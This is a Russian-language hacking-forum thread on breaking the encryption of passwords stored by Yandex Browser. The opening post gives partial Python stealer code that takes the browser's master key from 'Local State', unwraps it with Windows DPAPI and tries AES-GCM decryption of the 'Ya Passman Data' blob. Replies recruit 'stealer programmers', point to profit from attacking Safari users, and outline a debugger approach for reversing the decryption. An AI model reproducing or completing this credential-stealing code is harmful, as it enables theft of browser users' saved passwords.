• XSS.stack #1 – первый литературный журнал от юзеров форума

единый ЯндексБраузера тред

N3tSh4d0w

Нетраннеров Игнат
Пользователь
Регистрация
25.10.2021
Сообщения
253
Реакции
146
Депозит
1.337 Ł
Бесит. Очень бесит. Хочется расшифровать. Пока что вот какие мысли удалось собрать в кучу:

После декрипта DPAPIой мастер ключа, можно двигаться в Ya Passman Data, в которой у нас есть необычный блоб,
которого нет в ориг Хроме, по v10 можно сделать выводы, что тут у нас сам черт велел покапаться с аесом?

1707027322433.png


Код:
def passwords():
    try:
        conn = sqlite3.connect("Ya Passman Data")
        cursor = conn.cursor()
        cursor.execute("SELECT value FROM main.meta WHERE key='local_encryptor_data'")

Что думаете чертяки? Пока код такой:

Код:
import os
import sqlite3
import time
from Crypto.Cipher import AES
import json
import base64
from win32crypt import CryptUnprotectData

# Функция для извлечения паролей
def passwords():
    try:
        conn = sqlite3.connect("Ya Passman Data")
        cursor = conn.cursor()
        cursor.execute("SELECT value FROM main.meta WHERE key='local_encryptor_data'")

        # Получаем одну запись из результата запроса
        value = cursor.fetchone()

        # Проверяем, что значение было найдено
        if value is not None:
            local_encryptor_data = value[0]  # Извлекаем значение из кортежа
            master_key = get_master_key()
            decrypted_password = experiment_decrypt(local_encryptor_data, master_key)

            # Представляем байты в разных форматах
            hex_representation = decrypted_password.hex()
            ansi_representation = decrypted_password.decode('latin-1')
            length = len(decrypted_password)

            print(f"Decrypted Password (Hex): {hex_representation}")
            print(f"Decrypted Password (ANSI): {ansi_representation}")
            print(f"Decrypted Password Length: {length} bytes")
        else:
            print("Значение не найдено в базе данных")
        conn.close()
    except Exception as e:
        print(f"[!] Unknown Error: {e}")


def get_master_key():
    with open("Local State", "r", encoding="utf-8") as f:
        c = f.read()
    local_state = json.loads(c)
    key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    key = key[5:]
    key = CryptUnprotectData(key, None, None, None, 0)[1]
    return key

# Функция для проведения эксперимента с IV
def experiment_decrypt(buffer, master_key):
    try:
        iv = buffer[0:12]
        payload = buffer[15:]
        cipher = AES.new(master_key, AES.MODE_GCM, iv)
        decrypted_pass = cipher.decrypt(payload)
        return decrypted_pass
    except Exception as e:
        return f"Error _decrypt: {e}"

passwords()

Или думаете о том хуле мне не спится? ЗЫ: Кхорну нужно больше хаоса!
ЗЫ2: даже мелкашная ошибка в коде у меня будет незаметна в рантайме, если заинтересовались то перепроверьте пожалуйста х#йню же пишу
 
Последнее редактирование:
Далой такой пробел и безобразия, призывайте всех своих программирователей стиллеров, пусть покажут что есть яйца! КСС мы или тварь дрожащая перед Бело-Оранжевой угрозой!
 

Yandex is different from Chrome, although both have v10​

Спасибо я заметил, давай помогай включайся в работу. Это единый яндекс браузера тред
 
Как то не очень актуальные раскопки, ну разве что потренироваться, а так проку ноль.
Не зудит? - у меня зудит! Чет они там возомнили себе самый защищенный броузер блин. Если толку ноль то это не значит что "вызов не принят"
 
ну разве что потренироваться
Все потом будут говорить что мы мелкие и слабые, я прям чую как в конторе яндексовской все ржут над нами. Говорят что друг другу что они охуенные и жрут печенье. Нельзя просто так взять и оставить Артемовск, понимаешь?
 
Если почесать самолюбие, то ломай Safari.
Кому интересен яндексовский недобраузер?
Или ты по принципу, лучше быть первым в провинции, чем вторым в Риме?
 
Если почесать самолюбие, то ломай Safari.
Ты из конторы яндекса да? Агент влияния? Нет нет нет где моя шапочка из фольги? А вот она тут родная *одел/защитился*
 
Наш общий враг - амеры, а не какой то вшивый Яндекс.
Денег ты с этого не поимеешь, а вот с яблочников запросто.
Мы сюда за деньгами пришли, а не флажками помахать за кого-то.
Хакер всея Руси, ню-ню, флаг в руки..
Без обид, бро.
 
Наш общий враг - амеры, а не какой то вшивый Яндекс.
Денег ты с этого не поимеешь, а вот с яблочников запросто.
Мы сюда за деньгами пришли, а не флажками помахать за кого-то.
Хакер всея Руси, ню-ню, флаг в руки..
Я тебя чем то обидел? Хакер всея руси? Ты брат, меня не правильно наверное понял - мне вообще насрать на яндекс, тут просто спортивный интерес, не плети политику там где ее х#йма. А при чем тут хакер всея Руси, если просто угораю и хочу попробовать коллективно хотя бы ломануть его? Если нужен сафари, так потом отложим, в папочку положил.
 
Мы сюда за деньгами пришли
Ты например блог ведешь по видимому, только ради денег?
 
Если спортивный интерес, уважаю, надо ставить себе какие то цели и высоты, иначе скучно :)
Блог там больше рекламный, ну и опять же для души, ггг
 

Вот тут в обсуждении есть магнет где типа вроде как должен быть сурс яба
А так как в той же ветке сказано

So, the real action that can help us to understand how password are encrypted and stored is reversing the YaBrowser application, try to find the place where decrypting begin, breakepoint it and debug step by step.

Так что для удобства берём иду как фронт к виндбг и аттачимся к ябу, самое такое что первое на ум приходит бп -> CreateFile ("Ya Passman Data") запоминаем хендл -> ReadFile и дальше смотрим что происходит
 
Пожалуйста, обратите внимание, что пользователь заблокирован
А он только мне в тему кинул линк на эту тему? Почему просто в лс не написать?
1707043576242.png
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ты например блог ведешь по видимому, только ради денег?
Ну а тебя чем двигает чтоб попытаться расшифровать яндекс? Для общества (не верю)?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Не удивлюсь если ТС имеет какое-то отношение к команде разработчиков яндекса, где внутри команды было негласное баг-баунти от руководителя отдела на сумму 1млн рублей первому, кто расшифрует эту залупу. Ибо добавить этот топик аж в подпись, ТС, признавайся, что помимо спортивного интереса задумал?
 
Последнее редактирование:
работа по РУ
Я создал эту тему из спортивного интереса. Работа по ру - если я начну ру мат продавать. Если тебе интересно то тряхни старой школой и помоги. Будет классно. Я пока осваиваю IDA по урокам Яшечки. Постепенно обучаюсь. Мифы о багбаунти в Яндексе, это домыслы. Yandex это нидерландская компания, которая отношения к СНГ не имеет никакого - ломать теперь можно.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх